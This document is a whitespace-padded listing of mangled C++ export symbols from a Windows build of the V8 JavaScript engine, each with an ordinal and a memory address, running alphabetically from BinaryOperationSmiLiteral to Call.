                                                                                                                                                                                                                                    ?BinaryOperationSmiLiteral@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4Value@Token@34@VSmi@34@H@Z36640x140a59c50
                                                                                                                                                                                                                                    ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeJumpTable@234@H@Z36650x140a5a710
                                                                                                                                                                                                                                    ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeLabel@234@@Z36660x140a5a760
                                                                                                                                                                                                                                    ?Bind@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@PEAVBytecodeLoopHeader@234@@Z36670x140a5a7b0
                                                                                                                                                                                                                                    ?Bind@BytecodeLabels@interpreter@internal@v8@@QEAAXPEAVBytecodeArrayBuilder@234@@Z36680x140a39ac0
                                                                                                                                                                                                                                    ?Bind@CodeAssembler@compiler@internal@v8@@QEAAXPEAVCodeAssemblerLabel@234@@Z36690x1410a7030
                                                                                                                                                                                                                                    ?Bind@CodeAssemblerLabel@compiler@internal@v8@@AEAAXXZ36700x1410a7060
                                                                                                                                                                                                                                    ?Bind@CodeAssemblerVariable@compiler@internal@v8@@IEAAXPEAVNode@234@@Z36710x1410a7090
                                                                                                                                                                                                                                    ?Bind@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVRawMachineLabel@234@@Z36720x1412181d0
                                                                                                                                                                                                                                    ?Bind@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z36730x140853cd0
                                                                                                                                                                                                                                    ?Bind@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z36740x14056e120
                                                                                                                                                                                                                                    ?BindBreakTarget@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXXZ36750x140a337b0
                                                                                                                                                                                                                                    ?BindCaseTargetForCompareJump@SwitchBuilder@interpreter@internal@v8@@QEAAXHPEAVCaseClause@34@@Z36760x140a337c0
                                                                                                                                                                                                                                    ?BindCaseTargetForJumpTable@SwitchBuilder@interpreter@internal@v8@@QEAAXHPEAVCaseClause@34@@Z36770x140a33840
                                                                                                                                                                                                                                    ?BindContinueTarget@LoopBuilder@interpreter@internal@v8@@QEAAXXZ36780x140a338a0
                                                                                                                                                                                                                                    ?BindDefault@SwitchBuilder@interpreter@internal@v8@@QEAAXPEAVCaseClause@34@@Z36790x140a338b0
                                                                                                                                                                                                                                    ?BindExceptionHandler@TurboAssembler@internal@v8@@QEAAXPEAVLabel@23@@Z36800x140559690
                                                                                                                                                                                                                                    ?BindHandlerTarget@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z36810x140a52060
                                                                                                                                                                                                                                    ?BindJumpTableEntry@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeJumpTable@234@H@Z36820x140a52090
                                                                                                                                                                                                                                    ?BindLabel@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeLabel@234@@Z36830x140a520e0
                                                                                                                                                                                                                                    ?BindLoopEnd@LoopBuilder@interpreter@internal@v8@@AEAAXXZ36840x140a33910
                                                                                                                                                                                                                                    ?BindLoopHeader@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVBytecodeLoopHeader@234@@Z36850x140a52120
                                                                                                                                                                                                                                    ?BindToCurrentContext@UnboundScript@v8@@QEAA?AV?$Local@VScript@v8@@@2@XZ36860x140c78c00
                                                                                                                                                                                                                                    ?BindTryRegionEnd@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z36870x140a52150
                                                                                                                                                                                                                                    ?BindTryRegionStart@BytecodeArrayWriter@interpreter@internal@v8@@QEAAXPEAVHandlerTableBuilder@234@H@Z36880x140a52170
                                                                                                                                                                                                                                    ?BitcastFloat32ToInt32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$TNode@UFloat32T@internal@v8@@@34@@Z36890x1410a70a0
                                                                                                                                                                                                                                    ?BitcastFloat32ToInt32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36900x1410e1620
                                                                                                                                                                                                                                    ?BitcastFloat32ToInt32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36910x141051690
                                                                                                                                                                                                                                    ?BitcastFloat32ToInt32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36920x1410a7100
                                                                                                                                                                                                                                    ?BitcastFloat64ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36930x1410e1680
                                                                                                                                                                                                                                    ?BitcastFloat64ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36940x1410516a0
                                                                                                                                                                                                                                    ?BitcastFloat64ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36950x1410a7140
                                                                                                                                                                                                                                    ?BitcastInt32ToFloat32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat32T@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z36960x1410a7180
                                                                                                                                                                                                                                    ?BitcastInt32ToFloat32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36970x1410e16e0
                                                                                                                                                                                                                                    ?BitcastInt32ToFloat32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ36980x1410516b0
                                                                                                                                                                                                                                    ?BitcastInt32ToFloat32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z36990x1410a71e0
                                                                                                                                                                                                                                    ?BitcastInt64ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37000x1410e1740
                                                                                                                                                                                                                                    ?BitcastInt64ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37010x1410516c0
                                                                                                                                                                                                                                    ?BitcastInt64ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37020x1410a7220
                                                                                                                                                                                                                                    ?BitcastMaybeObjectToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@VMaybeObject@internal@v8@@@34@@Z37030x1410a7260
                                                                                                                                                                                                                                    ?BitcastMaybeObjectToWord@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37040x1410e17a0
                                                                                                                                                                                                                                    ?BitcastMaybeObjectToWord@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37050x1410516d0
                                                                                                                                                                                                                                    ?BitcastMaybeObjectToWord@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37060x1410a72c0
                                                                                                                                                                                                                                    ?BitcastTaggedToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@VObject@internal@v8@@@34@@Z37070x1410a7300
                                                                                                                                                                                                                                    ?BitcastTaggedToWord@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37080x1410e1830
                                                                                                                                                                                                                                    ?BitcastTaggedToWord@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37090x1410516e0
                                                                                                                                                                                                                                    ?BitcastTaggedToWord@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37100x1410a7360
                                                                                                                                                                                                                                    ?BitcastTaggedToWordForTagAndSmiBits@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@U?$UnionT@VObject@internal@v8@@VMaybeObject@23@@internal@v8@@@34@@Z37110x1410a73a0
                                                                                                                                                                                                                                    ?BitcastTaggedToWordForTagAndSmiBits@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37120x1410e18c0
                                                                                                                                                                                                                                    ?BitcastTaggedToWordForTagAndSmiBits@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37130x1410516f0
                                                                                                                                                                                                                                    ?BitcastTaggedToWordForTagAndSmiBits@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37140x1410a7400
                                                                                                                                                                                                                                    ?BitcastWord32ToWord64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37150x1410e1920
                                                                                                                                                                                                                                    ?BitcastWord32ToWord64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37160x141051700
                                                                                                                                                                                                                                    ?BitcastWordToTagged@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@@Z37170x1410a7440
                                                                                                                                                                                                                                    ?BitcastWordToTagged@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37180x1410e1980
                                                                                                                                                                                                                                    ?BitcastWordToTagged@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37190x141051710
                                                                                                                                                                                                                                    ?BitcastWordToTagged@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37200x1410a74a0
                                                                                                                                                                                                                                    ?BitcastWordToTaggedSigned@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VSmi@internal@v8@@@34@V?$TNode@UWordT@internal@v8@@@34@@Z37210x1410a74e0
                                                                                                                                                                                                                                    ?BitcastWordToTaggedSigned@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37220x1410e1a10
                                                                                                                                                                                                                                    ?BitcastWordToTaggedSigned@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37230x141051720
                                                                                                                                                                                                                                    ?BitcastWordToTaggedSigned@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z37240x1410a7540
                                                                                                                                                                                                                                    ?BitsetGlb@Type@compiler@internal@v8@@AEBA_KXZ37250x1410274c0
                                                                                                                                                                                                                                    ?BitsetGlbForTesting@Type@compiler@internal@v8@@QEAA?AV1234@XZ37260x14057e880
                                                                                                                                                                                                                                    ?BitsetLub@Type@compiler@internal@v8@@AEBA_KXZ37270x141027540
                                                                                                                                                                                                                                    ?BitsetLubForTesting@Type@compiler@internal@v8@@QEAA?AV1234@XZ37280x14057e8a0
                                                                                                                                                                                                                                    ?BitwiseAnd@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37290x1410c24a0
                                                                                                                                                                                                                                    ?BitwiseNot@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37300x1410c2560
                                                                                                                                                                                                                                    ?BitwiseOr@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37310x1410c2620
                                                                                                                                                                                                                                    ?BitwiseXor@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z37320x1410c26e0
                                                                                                                                                                                                                                    ?BlockCount@FunctionData@Coverage@debug@v8@@QEBA_KXZ37330x140bc86e0
                                                                                                                                                                                                                                    ?BoolConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UBoolT@internal@v8@@@34@_N@Z37340x140c0cfe0
                                                                                                                                                                                                                                    ?Boolean@Type@compiler@internal@v8@@SA?AV1234@XZ37350x14057e8c0
                                                                                                                                                                                                                                    ?BooleanConstant@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VOddball@internal@v8@@@34@_N@Z37360x1410a7580
                                                                                                                                                                                                                                    ?BooleanConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@_N@Z37370x14105c3b0
                                                                                                                                                                                                                                    ?BooleanMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ37380x1410dea20
                                                                                                                                                                                                                                    ?BooleanMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ37390x1410e1a70
                                                                                                                                                                                                                                    ?BooleanNot@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ37400x140097290
                                                                                                                                                                                                                                    ?BooleanOrNullOrNumber@Type@compiler@internal@v8@@SA?AV1234@XZ37410x14057e8d0
                                                                                                                                                                                                                                    ?BooleanOrNullOrUndefined@Type@compiler@internal@v8@@SA?AV1234@XZ37420x14057e8e0
                                                                                                                                                                                                                                    ?BooleanOrNumber@Type@compiler@internal@v8@@SA?AV1234@XZ37430x14057e8f0
                                                                                                                                                                                                                                    ?BooleanValue@Object@internal@v8@@QEAA_NPEAVIsolate@23@@Z37440x140908ae0
                                                                                                                                                                                                                                    ?BooleanValue@Value@v8@@QEBA_NPEAVIsolate@2@@Z37450x140c78cd0
                                                                                                                                                                                                                                    ?Boolean_string@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ37460x14053e2f0
                                                                                                                                                                                                                                    ?Boolean_string@LocalFactory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@XZ37470x1407df320
                                                                                                                                                                                                                                    ?BoundFunction@Type@compiler@internal@v8@@SA?AV1234@XZ37480x14057e900
                                                                                                                                                                                                                                    ?Boundaries@BitsetType@compiler@internal@v8@@CAPEBUBoundary@1234@XZ37490x141027620
                                                                                                                                                                                                                                    ?BoundariesArray@BitsetType@compiler@internal@v8@@0QBUBoundary@1234@B37500x141d45360
                                                                                                                                                                                                                                    ?BoundariesSize@BitsetType@compiler@internal@v8@@CA_KXZ37510x140b80270
                                                                                                                                                                                                                                    ?BoundsCheck@ModuleWireBytes@wasm@internal@v8@@QEBA_NVWireBytesRef@234@@Z37520x14053e300
                                                                                                                                                                                                                                    ?BracketListDelete@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@W4DFSDirection@1234@@Z37530x141253a50
                                                                                                                                                                                                                                    ?BracketListTRACE@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@@Z37540x141253b00
                                                                                                                                                                                                                                    ?Branch@BranchMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ37550x140097290
                                                                                                                                                                                                                                    ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@AEBV?$function@$$A6AXXZ@std@@1@Z37560x1410a75c0
                                                                                                                                                                                                                                    ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@AEBV?$function@$$A6AXXZ@std@@PEAVCodeAssemblerLabel@234@@Z37570x1410a7810
                                                                                                                                                                                                                                    ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UBoolT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@AEBV?$function@$$A6AXXZ@std@@@Z37580x1410a79d0
                                                                                                                                                                                                                                    ?Branch@CodeAssembler@compiler@internal@v8@@QEAAXV?$TNode@UIntegralT@internal@v8@@@34@PEAVCodeAssemblerLabel@234@1@Z37590x1410a7b90
                                                                                                                                                                                                                                    ?Branch@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4BranchHint@234@@Z37600x141039720
                                                                                                                                                                                                                                    ?Branch@DiamondMatcher@compiler@internal@v8@@QEBAPEAVNode@234@XZ37610x1400978d0
                                                                                                                                                                                                                                    ?Branch@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRawMachineLabel@234@1@Z37620x141218220
                                                                                                                                                                                                                                    ?BranchHintOf@compiler@internal@v8@@YA?AW4BranchHint@123@QEBVOperator@123@@Z37630x141039770
                                                                                                                                                                                                                                    ?BranchOrBacktrack@RegExpMacroAssemblerX64@internal@v8@@AEAAXW4Condition@23@PEAVLabel@23@@Z37640x14056e130
                                                                                                                                                                                                                                    ?BranchWithCriticalSafetyCheck@GraphAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@PEAV?$GraphAssemblerLabel@$0A@@234@1@Z37650x1410e1ac0
                                                                                                                                                                                                                                    ?Break@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ37660x140a33920
                                                                                                                                                                                                                                    ?Break@Debug@internal@v8@@QEAAXPEAVJavaScriptFrame@23@V?$Handle@VJSFunction@internal@v8@@@23@@Z37670x140bb7510
                                                                                                                                                                                                                                    ?BreakDownTime@DateCache@internal@v8@@QEAAX_JPEAH1111111@Z37680x140bd5b60
                                                                                                                                                                                                                                    ?BreakIfFalse@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@@Z37690x140a33950
                                                                                                                                                                                                                                    ?BreakIfNull@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ37700x140a33980
                                                                                                                                                                                                                                    ?BreakIfTrue@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@@Z37710x140a339b0
                                                                                                                                                                                                                                    ?BreakIfUndefined@BreakableControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ37720x140a339e0
                                                                                                                                                                                                                                    ?BreakIndexFromPosition@BreakIterator@internal@v8@@AEAAHH@Z37730x140bb7ad0
                                                                                                                                                                                                                                    ?BreakOnNode@CodeAssembler@compiler@internal@v8@@QEAAXH@Z37740x1410a7c90
                                                                                                                                                                                                                                    ?BreakRightNow@debug@v8@@YAXPEAVIsolate@2@V?$EnumSet@W4BreakReason@debug@v8@@H@base@2@@Z37750x140bc8710
                                                                                                                                                                                                                                    ?BroadcastSharedWasmMemoryGrow@BackingStore@internal@v8@@SAXPEAVIsolate@23@V?$shared_ptr@VBackingStore@internal@v8@@@std@@@Z37760x140a066a0
                                                                                                                                                                                                                                    ?Buffer@ArrayBufferView@v8@@QEAA?AV?$Local@VArrayBuffer@v8@@@2@XZ37770x140c78cf0
                                                                                                                                                                                                                                    ?Buffer@WasmMemoryObject@v8@@QEAA?AV?$Local@VArrayBuffer@v8@@@2@XZ37780x140bc9f20
                                                                                                                                                                                                                                    ?Build@?$CTypeInfoBuilder@H$S@v8@@SA?AVCTypeInfo@2@XZ37790x140098d40
                                                                                                                                                                                                                                    ?Build@?$CTypeInfoBuilder@I$S@v8@@SA?AVCTypeInfo@2@XZ37800x140098d50
                                                                                                                                                                                                                                    ?Build@?$CTypeInfoBuilder@M$S@v8@@SA?AVCTypeInfo@2@XZ37810x140098d60
                                                                                                                                                                                                                                    ?Build@?$CTypeInfoBuilder@N$S@v8@@SA?AVCTypeInfo@2@XZ37820x140098d70
                                                                                                                                                                                                                                    ?Build@?$CTypeInfoBuilder@V?$Local@VValue@v8@@@v8@@$S@v8@@SA?AVCTypeInfo@2@XZ37830x14018a960
                                                                                                                                                                                                                                    ?Build@?$CTypeInfoBuilder@X$S@v8@@SA?AVCTypeInfo@2@XZ37840x14018a970
                                                                                                                                                                                                                                    ?Build@CodeBuilder@Factory@internal@v8@@QEAA?AV?$Handle@VCode@internal@v8@@@34@XZ37850x140b20ec0
                                                                                                                                                                                                                                    ?Build@JSFunctionBuilder@Factory@internal@v8@@QEAA?AV?$Handle@VJSFunction@internal@v8@@@34@XZ37860x140b20f00
                                                                                                                                                                                                                                    ?BuildBlockCoverage@SwitchBuilder@interpreter@internal@v8@@AEAAXPEAVCaseClause@34@@Z37870x140a33a10
                                                                                                                                                                                                                                    ?BuildCFG@Scheduler@compiler@internal@v8@@AEAAXXZ37880x1411d5d60
                                                                                                                                                                                                                                    ?BuildCheckEqualsName@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@AEBVNameRef@234@PEAV5234@11@Z37890x14119dcc0
                                                                                                                                                                                                                                    ?BuildDescriptorArray@MapUpdater@internal@v8@@AEAA?AV?$Handle@VDescriptorArray@internal@v8@@@23@XZ37900x14092d250
                                                                                                                                                                                                                                    ?BuildElementAccess@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0000AEBVElementAccessInfo@234@AEBVKeyedAccessMode@234@@Z37910x14119dd70
                                                                                                                                                                                                                                    ?BuildExtendPropertiesBackingStore@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@AEBVMapRef@234@PEAV5234@11@Z37920x14119fc10
                                                                                                                                                                                                                                    ?BuildGetModuleCell@JSTypedLowering@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@@Z37930x1411ac4a0
                                                                                                                                                                                                                                    ?BuildIndexedStringLoad@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00PEAPEAV5234@1W4KeyedAccessLoadMode@34@@Z37940x1411a0190
                                                                                                                                                                                                                                    ?BuildInitialYield@Parser@internal@v8@@AEAAPEAVExpression@23@HW4FunctionKind@23@@Z37950x1408b9ca0
                                                                                                                                                                                                                                    ?BuildInitializationBlock@Parser@internal@v8@@AEAAPEAVStatement@23@PEAUDeclarationParsingResult@?$ParserBase@VParser@internal@v8@@@23@@Z37960x1408b9de0
                                                                                                                                                                                                                                    ?BuildInlinedJSToWasmWrapper@compiler@internal@v8@@YAXPEAVZone@23@PEAVMachineGraph@123@PEBV?$Signature@VValueType@wasm@internal@v8@@@23@PEBUWasmModule@wasm@23@PEAVIsolate@23@PEAVSourcePositionTable@123@W4StubCallMode@23@VWasmFeatures@823@PEBVJSWasmCallData@123@PEAVNode@123@@Z37970x141079ea0
                                                                                                                                                                                                                                    ?BuildInternal@CodeBuilder@Factory@internal@v8@@AEAA?AV?$MaybeHandle@VCode@internal@v8@@@34@_N@Z37980x140b20ff0
                                                                                                                                                                                                                                    ?BuildLoadPrototypeFromObject@JSNativeContextSpecialization@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@00@Z37990x1411a05f0
                                                                                                                                                                                                                                    ?BuildLoopTree@LoopFinder@compiler@internal@v8@@SAPEAVLoopTree@234@PEAVGraph@234@PEAVTickCounter@34@PEAVZone@34@@Z38000x1411bf3d0
                                                                                                                                                                                                                                    ?BuildParameterInitializationBlock@Parser@internal@v8@@AEAAPEAVBlock@23@AEBUParserFormalParameters@23@@Z38010x1408b9ef0
                                                                                                                                                                                                                                    ?BuildPropertyAccess@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AV?$Optional@VValueEffectControl@JSNativeContextSpecialization@compiler@internal@v8@@@base@4@PEAVNode@234@000000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@W4AccessMode@234@@Z38020x1411a06e0
                                                                                                                                                                                                                                    ?BuildPropertyLoad@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AV?$Optional@VValueEffectControl@JSNativeContextSpecialization@compiler@internal@v8@@@base@4@PEAVNode@234@00000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@@Z38030x1411a0880
                                                                                                                                                                                                                                    ?BuildPropertyStore@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@00000AEBVNameRef@234@PEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@AEBVPropertyAccessInfo@234@W4AccessMode@234@@Z38040x1411a0b40
                                                                                                                                                                                                                                    ?BuildPropertyTest@JSNativeContextSpecialization@compiler@internal@v8@@AEAA?AVValueEffectControl@1234@PEAVNode@234@0AEBVPropertyAccessInfo@234@@Z38050x1411a1860
                                                                                                                                                                                                                                    ?BuildRaw@JSFunctionBuilder@Factory@internal@v8@@AEAA?AV?$Handle@VJSFunction@internal@v8@@@34@V?$Handle@VCode@internal@v8@@@34@@Z38060x140b21a20
                                                                                                                                                                                                                                    ?BuildRejectPromiseOnException@Parser@internal@v8@@AEAAPEAVBlock@23@PEAV423@W4REPLMode@23@@Z38070x1408ba2a0
                                                                                                                                                                                                                                    ?BuildReturnStatement@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEAVStatement@23@PEAVExpression@23@HH@Z38080x14088d480
                                                                                                                                                                                                                                    ?BuildTFGraph@wasm@internal@v8@@YA?AV?$Result@$$T@123@PEAVAccountingAllocator@23@AEBVWasmFeatures@123@PEBUWasmModule@123@PEAVWasmGraphBuilder@compiler@23@PEAV6123@AEBUFunctionBody@123@PEAV?$vector@UWasmLoopInfo@compiler@internal@v8@@V?$allocator@UWasmLoopInfo@compiler@internal@v8@@@std@@@std@@PEAVNodeOriginTable@923@HW4InlinedStatus@123@@Z38090x1406a03f0
                                                                                                                                                                                                                                    ?BuildTranslation@CodeGenerator@compiler@internal@v8@@AEAAPEAVDeoptimizationExit@234@PEAVInstruction@234@H_K1VOutputFrameStateCombine@234@@Z38100x14106c990
                                                                                                                                                                                                                                    ?BuildTranslationForFrameStateDescriptor@CodeGenerator@compiler@internal@v8@@AEAAXPEAVFrameStateDescriptor@234@PEAVInstructionOperandIterator@234@VOutputFrameStateCombine@234@@Z38110x14106ce40
                                                                                                                                                                                                                                    ?BuildTree@StateValuesCache@compiler@internal@v8@@AEAAPEAVNode@234@PEA_KPEAPEAV5234@_KPEBVBytecodeLivenessState@234@2@Z38120x1410dfd90
                                                                                                                                                                                                                                    ?BuildUnaryExpression@Parser@internal@v8@@AEAAPEAVExpression@23@PEAV423@W4Value@Token@23@H@Z38130x1408ba600
                                                                                                                                                                                                                                    ?BuiltinEntry@TurboAssemblerBase@internal@v8@@QEAA_KW4Builtin@23@@Z38140x140bdae20
                                                                                                                                                                                                                                    ?ByteLength@ArrayBuffer@v8@@QEBA_KXZ38150x140c78e20
                                                                                                                                                                                                                                    ?ByteLength@ArrayBufferView@v8@@QEAA_KXZ38160x140c78e30
                                                                                                                                                                                                                                    ?ByteLength@BackingStore@v8@@QEBA_KXZ38170x1400978d0
                                                                                                                                                                                                                                    ?ByteLength@SharedArrayBuffer@v8@@QEBA_KXZ38180x140c78e20
                                                                                                                                                                                                                                    ?ByteOffset@ArrayBufferView@v8@@QEAA_KXZ38190x140c78e50
                                                                                                                                                                                                                                    ?BytecodeHasHandler@Bytecodes@interpreter@internal@v8@@SA_NW4Bytecode@234@W4OperandScale@234@@Z38200x140a362c0
                                                                                                                                                                                                                                    ?CEntry@CodeFactory@internal@v8@@SA?AV?$Handle@VCode@internal@v8@@@23@PEAVIsolate@23@HW4SaveFPRegsMode@23@W4ArgvMode@23@_N@Z38210x140c0d020
                                                                                                                                                                                                                                    ?CEntryStubConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@HW4SaveFPRegsMode@34@W4ArgvMode@34@_N@Z38220x1410dea60
                                                                                                                                                                                                                                    ?CEntryStubConstant@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@H@Z38230x1410e1bf0
                                                                                                                                                                                                                                    ?CSPViolation@ReasonEnum@Paused@API@Debugger@protocol@v8_inspector@@3PEBDEB38240x142298c78
                                                                                                                                                                                                                                    ?CachedDataVersionTag@ScriptCompiler@v8@@SAIXZ38250x140c78e70
                                                                                                                                                                                                                                    ?CalculateAllocationLimit@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@SA_KPEAVHeap@23@_K111NW4HeapGrowingMode@423@@Z38260x140b16a10
                                                                                                                                                                                                                                    ?CalculateAllocationLimit@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@SA_KPEAVHeap@23@_K111NW4HeapGrowingMode@423@@Z38270x140b16ba0
                                                                                                                                                                                                                                    ?CalculateFixedFrameSize@CallDescriptor@compiler@internal@v8@@QEBAHW4CodeKind@34@@Z38280x14102b480
                                                                                                                                                                                                                                    ?CalculateValue@Utf8@unibrow@@SAIPEBE_KPEA_K@Z38290x1407cc460
                                                                                                                                                                                                                                    ?Call@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4ConvertReceiverMode@23@@Z38300x140c0d1d0
                                                                                                                                                                                                                                    ?Call@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@PEBVCallDescriptor@234@@Z38310x1410397b0
                                                                                                                                                                                                                                    ?Call@Execution@internal@v8@@SA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@1HQEAV623@@Z38320x140b803e0
                                                                                                                                                                                                                                    ?Call@Function@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@HQEAV52@@Z38330x140c78f00
                                                                                                                                                                                                                                    ?Call@GraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@PEBVCallDescriptor@234@HPEAPEAVNode@234@@Z38340x1410e1c30
                                                                                                                                                                                                                                    ?Call@GraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VObject@internal@v8@@@34@PEBVOperator@234@HPEAPEAVNode@234@@Z38350x1410e1ca0
                                                                                                                                                                                                                                    ?Call@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@_KAEBVCallFrequency@234@AEBUFeedbackSource@234@W4ConvertReceiverMode@34@W4SpeculationMode@34@W4CallFeedbackRelation@234@@Z38360x1410c27a0
